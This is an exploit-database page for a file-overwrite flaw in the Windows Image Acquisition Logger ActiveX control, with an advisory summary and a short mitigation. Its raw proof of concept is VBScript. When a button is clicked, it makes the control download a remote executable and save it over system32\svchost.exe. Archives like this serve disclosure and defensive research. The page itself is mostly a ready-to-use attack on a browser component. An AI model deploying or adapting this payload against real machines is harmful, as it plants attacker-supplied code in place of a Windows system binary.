header-logo
Suggest Exploit
vendor:
Windows Image Acquisition Logger ActiveX Control
by:
SecurityFocus
7.5
CVSS
HIGH
File Overwrite Vulnerability
434
CWE
Product Name: Windows Image Acquisition Logger ActiveX Control
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Windows Image Acquisition Logger ActiveX Control File Overwrite Vulnerability

Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input. An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.

Mitigation:

Users should avoid visiting untrusted websites and clicking on links provided by unknown or untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31069/info

Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.

An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks. 

<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   dim remURL
   remURL = "http://victim.com/svchost.exe"
   test.Open remURL, True
   test.Save "C:\WINDOWS\system32\svchost.exe", True
 End Sub
</script>